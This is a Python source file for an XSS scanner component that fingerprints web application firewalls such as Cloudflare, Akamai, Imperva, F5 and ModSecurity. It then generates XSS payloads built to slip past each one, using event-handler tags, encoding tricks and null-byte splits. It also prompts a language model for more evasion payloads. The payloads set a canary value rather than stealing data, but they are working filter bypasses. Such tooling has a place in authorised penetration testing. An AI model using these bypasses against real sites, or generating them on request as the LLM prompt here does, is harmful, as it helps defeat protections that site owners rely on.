#!/usr/bin/env python3
"""
XSS ReflexionX v1.0.0 — WAF Fingerprint + AI Bypass Advisor
Detects WAF blocks during scanning and generates human-readable + actionable
bypass advice powered by LLM.

Detection:
  - HTTP status code patterns (403, 429, 406 with WAF-like headers)
  - Response body patterns (Cloudflare, Akamai, Imperva, Sucuri, Wordfence, etc.)
  - Response time anomalies (WAF challenge pages often have longer response times)
  - JavaScript challenge detection (Cloudflare IUAM)

Bypass advice:
  - LLM-generated payload transforms
  - Header modifications
  - Protocol switches (GET→POST, URL encoding changes)
  - Timing patterns

Usage:
    python3 waf_bypass_advisor.py --test
    python3 waf_bypass_advisor.py --blocked-responses blocked_responses.json --output-dir output/
"""

import argparse, hashlib, json, os, re, sys, time

try:
    from ai_core import get_llm_client, LLMClient
    HAS_AI = True
except ImportError:
    HAS_AI = False

CACHE_DIR = ".waf_cache"

# ── WAF fingerprint patterns ───────────────────────────────────

WAF_SIGNATURES = {
    "cloudflare": {
        "name": "Cloudflare",
        "body_patterns": [
            r"cloudflare", r"cf-ray", r"attention required!",
            r"access denied.*cloudflare", r"please enable cookies",
            r"cf-bmi", r"cf-chl-bypass",
        ],
        "header_patterns": ["cf-ray", "cf-cache-status", "cf-request-id"],
    },
    "akamai": {
        "name": "Akamai (Kona Site Defender / AppWAAP)",
        "body_patterns": [
            r"akamai", r"reference #[0-9a-f]+", r"access denied",
            r"http/2 403", r"akamai-gtm",
        ],
        "header_patterns": ["akamai-gtm", "x-akamai-session-info"],
    },
    "imperva": {
        "name": "Imperva / Incapsula",
        "body_patterns": [
            r"incapsula", r"imperva", r"access denied.*incapsula",
            r"document\.location = .*incapsula",
        ],
        "header_patterns": ["x-cdn", "x-iinfo", "incap_ses"],
    },
    "sucuri": {
        "name": "Sucuri WAF",
        "body_patterns": [r"sucuri", r"access denied.*sucuri", r"sucuri website firewall"],
        "header_patterns": ["x-sucuri-cache", "x-sucuri-id"],
    },
    "wordfence": {
        "name": "Wordfence (WordPress)",
        "body_patterns": [r"wordfence", r"generated by wordfence"],
        "header_patterns": ["x-wf-profile"],
    },
    "amazon_waf": {
        "name": "AWS WAF",
        "body_patterns": [r"aws web application firewall"],
        "header_patterns": ["x-amzn-requestid", "x-amz-cf-id"],
    },
    "azure_frontdoor": {
        "name": "Azure Front Door / Application Gateway",
        "body_patterns": [r"azure", r"application gateway"],
        "header_patterns": ["x-azure-ref", "x-fd-version"],
    },
    "f5_bigip": {
        "name": "F5 BIG-IP ASM",
        "body_patterns": [r"the requested url was rejected", r"big-?ip", r"support id"],
        "header_patterns": ["bigipserver", "x-wa-info"],
    },
    "barracuda": {
        "name": "Barracuda WAF",
        "body_patterns": [r"barracuda", r"blocked by barracuda"],
        "header_patterns": ["barra_counter_session"],
    },
    "modsecurity": {
        "name": "ModSecurity",
        "body_patterns": [r"modsecurity", r"access denied.*mod_security", r"mod_security"],
        "header_patterns": ["x-mod-security", "server.*modsecurity"],
    },
    "generic_challenge": {
        "name": "Generic JS Challenge",
        "body_patterns": [
            r"setTimeout.*location", r"javax\.faces\.ViewState",
            r"challenge-platform", r"please verify you are a human",
        ],
    },
}

# ── Blocked response DB ───────────────────────────────────────

_blocked_db = []
_cache = {}


def fingerprint_waf(status_code, headers, body, url=""):
    """Return list of matched WAF products with confidence."""
    matches = []
    headers_lower = {k.lower(): v for k, v in (headers or {}).items()}
    body_lower = (body or "").lower()[:10000]

    for waf_id, sig in WAF_SIGNATURES.items():
        score = 0
        reasons = []

        for pat in sig.get("body_patterns", []):
            if re.search(pat, body_lower, re.IGNORECASE):
                score += 2
                reasons.append(f"body_match:{pat[:40]}")

        for hpat in sig.get("header_patterns", []):
            for hk, hv in headers_lower.items():
                if hpat.lower() in hk:
                    score += 3
                    reasons.append(f"header_match:{hk}")

        if status_code in (403, 429, 406, 503) and score > 0:
            score += 1
            reasons.append(f"status_{status_code}")

        if score >= 2:
            confidence = "high" if score >= 4 else "medium"
            matches.append({
                "waf": sig["name"],
                "waf_id": waf_id,
                "confidence": confidence,
                "score": score,
                "reasons": reasons,
            })

    matches.sort(key=lambda x: x["score"], reverse=True)
    return matches


def record_blocked(url, status_code, headers, body, tool="unknown"):
    """Record a blocked response for later analysis."""
    entry = {
        "url": url,
        "status": status_code,
        "headers": dict(headers or {}),
        "body": (body or "")[:5000],
        "tool": tool,
        "ts": time.time(),
    }
    _blocked_db.append(entry)
    return entry


def generate_bypass_payloads(waf_match, context="html_body", encoding="raw",
                              quote_type="double", canary="HF5XSSCONFIRMED"):
    """Generate bypass payloads based on WAF identification."""
    waf_id = waf_match.get("waf_id", "")
    payloads = []

    base = {
        "html_body": [
            f"<svg onload=window._xss_confirmed='{canary}'>",
            f"<details open ontoggle=window._xss_confirmed='{canary}'>",
            f"<input onfocus=window._xss_confirmed='{canary}' autofocus>",
            f"<body onload=window._xss_confirmed='{canary}'>",
        ],
        "html_attribute": [
            f"'><svg onload=window._xss_confirmed='{canary}'>",
            f"javascript:window._xss_confirmed='{canary}'",
            f"data:text/html,<script>window._xss_confirmed='{canary}'</script>",
        ],
        "javascript": [
            f"';window._xss_confirmed='{canary}'//",
            f'";window._xss_confirmed=\'{canary}\'//',
        ],
    }

    # WAF-specific mutations
    waf_specific = {
        "cloudflare": [
            # Cloudflare often passes URL-encoded and unusual event handlers
            f"%3Csvg+onload%3Dwindow._xss_confirmed%3D%27{canary}%27%3E",
            f"<svg%0Aonload=window._xss_confirmed='{canary}'>",
            f"<svg/onload=window._xss_confirmed='{canary}'>",
            f"<svg onload=%00window._xss_confirmed='{canary}'>",
        ],
        "akamai": [
            # Akamai sometimes misses encoded event handlers
            f"%3Cimg%20src=x%20onerror=window._xss_confirmed%3D%27{canary}%27%3E",
            f"<img src=x onerror=window._xss_confirmed='{canary}'>",
        ],
        "imperva": [
            f"<svg onload=window._xss_confirmed='{canary}' x='>",
            f"<details open ontoggle=window._xss_confirmed='{canary}' style=display:block>",
        ],
        "f5_bigip": [
            # F5 may block script but not unusual tags
            f"<marquee onstart=window._xss_confirmed='{canary}'>",
            f"<video src=x onerror=window._xss_confirmed='{canary}'>",
        ],
        "modsecurity": [
            # ModSecurity CRS often misses these
            f"<svg/onload=alert(1)>",
            f"<svg onload=window._xss_confirmed='{canary}'>",
            f"<<script>window._xss_confirmed='{canary}'</script>>",
        ],
        "generic_challenge": [
            f"<script>window._xss_confirmed='{canary}'</script>",
            f"javascript:window._xss_confirmed='{canary}'",
        ],
    }

    payloads = list(base.get(context, base["html_body"]))
    if waf_id in waf_specific:
        payloads.extend(waf_specific[waf_id])

    # Always add encoding mutations
    payloads.extend([
        f"%3Cscript%3Ewindow._xss_confirmed%3D%27{canary}%27%3C%2Fscript%3E",
        f"&lt;script&gt;window._xss_confirmed='{canary}'&lt;/script&gt;",
    ])

    return payloads


def get_ai_bypass_advice(waf_match, context="html_body", blocked_body="",
                         llm_client=None):
    """Ask LLM for specific bypass advice given WAF fingerprint."""
    if llm_client is None and HAS_AI:
        llm_client = get_llm_client()
    if not llm_client or not llm_client.is_configured:
        return None

    waf_name = waf_match.get("waf", "Unknown WAF")
    confidence = waf_match.get("confidence", "medium")
    reasons = ", ".join(waf_match.get("reasons", []))

    prompt = f"""A WAF has blocked our XSS scan. Provide specific bypass payloads.

WAF: {waf_name}
Confidence: {confidence}
Detection signals: {reasons}

We need payloads for this context: {context}.

Provide 5 specific bypass payloads that:
1. Use encoding or transformations this WAF likely misses
2. Use unusual HTML tags/attributes if standard vectors are blocked
3. Output one payload per line, no explanations

Each payload MUST contain: window._xss_confirmed='HF5XSSCONFIRMED'"""

    resp = llm_client.chat(prompt, role="waf_advisor", temperature=0.8, max_tokens=512)
    if resp:
        return {"advice": resp, "source": "llm", "waf": waf_name}
    return None


# ── CLI ────────────────────────────────────────────────────────

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="WAF Bypass Advisor")
    parser.add_argument("--test", action="store_true")
    parser.add_argument("--blocked-responses", default=None,
                        help="JSON file with blocked response entries")
    parser.add_argument("--status-code", type=int, default=403)
    parser.add_argument("--headers", default=None, help="JSON headers string")
    parser.add_argument("--body", default=None, help="Path to response body file")
    parser.add_argument("--url", default="")
    parser.add_argument("--context", default="html_body")
    parser.add_argument("--output-dir", default=".")
    parser.add_argument("--no-llm", action="store_true")
    args = parser.parse_args()

    if args.test:
        # Test Cloudflare detection
        cf_body = "<title>Attention Required! | Cloudflare</title>Please enable JavaScript"
        cf_headers = {"cf-ray": "abc123", "server": "cloudflare"}
        m = fingerprint_waf(403, cf_headers, cf_body)
        assert len(m) > 0
        assert m[0]["waf_id"] == "cloudflare"
        assert m[0]["confidence"] == "high"

        # Test ModSecurity detection (body must contain the WAF name for detection)
        modsec_body = "ModSecurity: Access denied with code 403 (phase 2). Match of \"rx ^script\" against \"ARGS:q\""
        m2 = fingerprint_waf(403, {"server": "Apache"}, modsec_body)
        assert any(x["waf_id"] == "modsecurity" for x in m2), f"ModSecurity not detected in: {modsec_body[:80]}"

        # Test bypass generation
        bpg = generate_bypass_payloads(m[0], context="html_attribute")
        assert len(bpg) > 0
        assert all("HF5XSSCONFIRMED" in p for p in bpg)

        print("[OK] WAF Bypass Advisor self-test passed")
        print(f"  Cloudflare detection: confidence={m[0]['confidence']}")
        print(f"  ModSecurity detection: confidence={[x['confidence'] for x in m2 if x['waf_id']=='modsecurity'][0]}")
        print(f"  Bypass payloads generated: {len(bpg)}")
        sys.exit(0)

    # Run analysis
    blocked_entries = []
    if args.blocked_responses and os.path.isfile(args.blocked_responses):
        with open(args.blocked_responses) as f:
            data = json.load(f)
            if isinstance(data, list):
                blocked_entries = data
            elif isinstance(data, dict):
                blocked_entries = [data]

    headers = {}
    if args.headers:
        try:
            headers = json.loads(args.headers)
        except json.JSONDecodeError:
            pass
    if args.body and os.path.isfile(args.body):
        body = open(args.body, errors="replace").read()[:10000]
    else:
        body = ""

    all_matches = []
    for entry in blocked_entries:
        m = fingerprint_waf(
            entry.get("status", args.status_code),
            entry.get("headers", {}),
            entry.get("body", body),
            entry.get("url", args.url),
        )
        all_matches.extend(m)

    if not all_matches:
        m = fingerprint_waf(args.status_code, headers, body, args.url)
        all_matches = m

    os.makedirs(args.output_dir, exist_ok=True)

    results = []
    seen = set()
    for m in all_matches:
        key = m["waf_id"]
        if key in seen:
            continue
        seen.add(key)

        bypass_payloads = generate_bypass_payloads(m, context=args.context)
        record = {
            "waf": m["waf"],
            "waf_id": m["waf_id"],
            "confidence": m["confidence"],
            "reasons": m["reasons"],
            "bypass_payloads": bypass_payloads[:10],
        }

        if not args.no_llm:
            advice = get_ai_bypass_advice(m, context=args.context, blocked_body=body)
            if advice:
                record["ai_advice"] = advice

        results.append(record)
        print(f"[WAF] {m['waf']} (confidence: {m['confidence']})")
        print(f"       Signals: {', '.join(m['reasons'][:3])}")
        print(f"       Bypass payloads: {len(bypass_payloads)}")

    out = os.path.join(args.output_dir, "waf_analysis.json")
    with open(out, "w") as f:
        json.dump(results, f, indent=2)
    print(f"\n[OK] WAF analysis saved to {out}")
